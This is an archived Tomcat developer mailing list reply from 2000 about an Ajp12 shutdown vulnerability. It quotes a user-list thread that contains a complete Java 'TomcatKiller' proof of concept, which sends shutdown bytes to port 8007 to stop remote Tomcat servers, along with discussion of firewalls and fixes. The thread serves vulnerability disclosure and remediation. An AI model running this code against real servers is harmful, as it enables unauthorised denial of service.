tomcat-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From cmanola...@yahoo.com
Subject Re: Tomcat Security Vulnerability
Date Thu, 05 Oct 2000 21:29:47 GMT
Hi,

AFAIK there is a check on Ajp12 to verify if the host sending the stop
request is the same as localhost - that means someone from outside
shuldn't be able to stop tomcat. IF this is not true - then there is a
problem in isSameAddress().

Regarding the ability to send requests on 8007 - the AJP12 requests are
identical with equivalent HTTP requests ( except that a binary format is
used ).

In any case, most OS allow you to set IP rules ( I know about Solaris -
Linux, BSD - ipfw, ipnat, etc ). This is not required.

It is easy to add special filters on the AJP12 protocol ( or AJP13 ).

The JNI adapter doesn't have this problem, but works only with IIS and NES
( latest Apache 2.0 requires changes in mod_jk, and we don't have them so
far).

Costin 


On Thu, 5 Oct 2000, Michael Percy wrote:

> All,
> Since I am uncertain how many of you check the tomcat-user list often, and I
> am not personally a Java developer, I wanted to get you all in the loop on
> this (and hopefully get some discussion going on a solution). What I am
> talking about is the "Tomcat Killer" thread on tomcat-user over the past
> hour. I have pasted in the mentioned thread below, in hopes that the people
> who can do somthing about it (the developers) will have comments on it. I am
> also curious as to whether or not ajpv13 is susceptible to this kind of
> attack, and am not sure how to go about finding out.
> 
> 
> Regards,
> 
> Michael Percy
> QA Automation Eng.
> Portera Systems
> 
> 
> > -----Original Message-----
> > From: Michael Percy [mailto:mpercy@portera.com]
> > Sent: Thursday, October 05, 2000 1:36 PM
> > To: 'tomcat-user@jakarta.apache.org'
> > Subject: RE: Tomcat Killer
> > 
> > 
> > I'd like to point out that many people who wish to run Tomcat 
> > (at home, on a
> > LAN, etc.) do not have a spare machine/router to filter 
> > packets. Plus, many
> > setups include multiple ports on which different connectors 
> > run (to keep
> > configurations separate, etc.) so one cannot just firewall 
> > 8007 and proclaim
> > all is well. This is very dangerous and should be 
> > changed/patched/upgraded!
> > If Tomcat requires a firewall to be run safely, then it is 
> > NOT a secure
> > product (it relies on the security of other, unrelated people and
> > products!). This must be taken care of.
> > 
> > On a related note, does anyone know if the JNI connector is 
> > susceptible to
> > this? If not, then this can be a short-term workaround (does 
> > it work yet?).
> > 
> > 
> > Regards,
> > 
> > Michael Percy
> > QA Automation Eng.
> > Portera Systems
> > 
> > 
> > > -----Original Message-----
> > > From: Josh Knowles [mailto:josh.knowles@worldwidepackets.com]
> > > Sent: Thursday, October 05, 2000 1:27 PM
> > > To: 'tomcat-user@jakarta.apache.org'
> > > Subject: RE: Tomcat Killer
> > > 
> > > 
> > > You would think that has long as your firewall only allows 
> > > access to port 80
> > > and or 8080 and not 8007 then you would be fine.  Nice find though.
> > > 
> > > Josh
> > > 
> > > -----Original Message-----
> > > From: Sean Schofield [mailto:sean@schof.com]
> > > Sent: Thursday, October 05, 2000 1:23 PM
> > > To: tomcat-user@jakarta.apache.org
> > > Subject: Re: Tomcat Killer
> > > 
> > > 
> > > Cool find!
> > > 
> > > Couldn't this be protected against by a firewall filtering 
> > > incoming traffic 
> > > so both Apache and Tomcat are behind a firewall to the 
> > Intrenet and a 
> > > another firewall between these servers and the LAN?  Then you 
> > > would only 
> > > have to worry about other servlets, etc. within the firewall 
> > > messing things 
> > > up.  And even then I think you need root to create sockets 
> > don't you?
> > > 
> > > Should this be posted to Bugtraq?
> > > 
> > > - schof
> > > 
> > > At 12:51 PM 10/5/00 -0700, you wrote:
> > > 
> > > >Hi all, just a word of warning about Tomcat 3.1 and from what I can
> > > >tell, 3.2beta4.  Looking at the source code, if you're using Ajp12 for
> > > >the Apache-Tomcat comms protocol, be aware that the "Stop Tomcat"
> > > >batch/shell file does its job by sending "exit please" bytes to
> > > >Tomcat.  It doesn't take much to spoof this, here's my TomcatKiller
> > > >class below.  Just guess a host and port which may have Tomcat
> > > >running, and over it goes...
> > > >
> > > >I patched the sources so hopefully it won't happen to me ;)
> > > >
> > > >
> > > >import java.net.*;
> > > >import java.io.*;
> > > >
> > > >public class TomcatKiller {
> > > >
> > > >         static public void main( String[] args ) {
> > > >
> > > >                 final byte SIGNAL = (byte)254;
> > > >                 final byte BYEBYE = (byte)15;
> > > >                 byte[] msg = { SIGNAL, BYEBYE };
> > > >
> > > >                 int min = 8007, max = 8007;
> > > >                 String host = args[0];
> > > >
> > > >                 try {
> > > >                         if( args.length > 1 )
> > > >                                 min = max = 
> > > Integer.parseInt( args[1] );
> > > >                         if( args.length > 2 )
> > > >                                 max = Integer.parseInt( args[2] );
> > > >                         if( min > max ) {
> > > >                                 int tmp = min;
> > > >                                 min = max;
> > > >                                 max = tmp;
> > > >                         }
> > > >                         for( int i = min; i <= max; i++ ) {
> > > >                                 try {
> > > >                                         Socket s = new 
> > > Socket( host, i );
> > > >                                         OutputStream os = 
> > > > s.getOutputStream();
> > > >                                         os.write( msg );
> > > >                                         os.flush();
> > > >                                         break;
> > > >                                 } catch( ConnectException ce ) {
> > > >                                         System.err.println( 
> > > "conn refused 
> > > > " + i );
> > > >                                 } catch( IOException ioe ) {
> > > >                                         ioe.printStackTrace();
> > > >                                         break;
> > > >                                 }
> > > >                         }
> > > >                 } catch( Exception e ) {
> > > >                         e.printStackTrace();
> > > >                         System.exit( 1 );
> > > >                 }
> > > >         }
> > > >}
> > > >
> > > >// eof
> > > >
> > > >
> > > >stu
> > > >
> > > >
> > > >--
> > > >Stuart Maclean, Research Associate
> > > >University of Washington
> > > >ITS Research Program, College of Engineering
> > > >Box 352500
> > > >Seattle, WA 98195-2500
> > > >Tel: (206) 543-0637
> > > >http://www.its.washington.edu
> > > 
> > 
> 
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: tomcat-dev-unsubscribe@jakarta.apache.org
> For additional commands, e-mail: tomcat-dev-help@jakarta.apache.org
> 


Mime
View raw message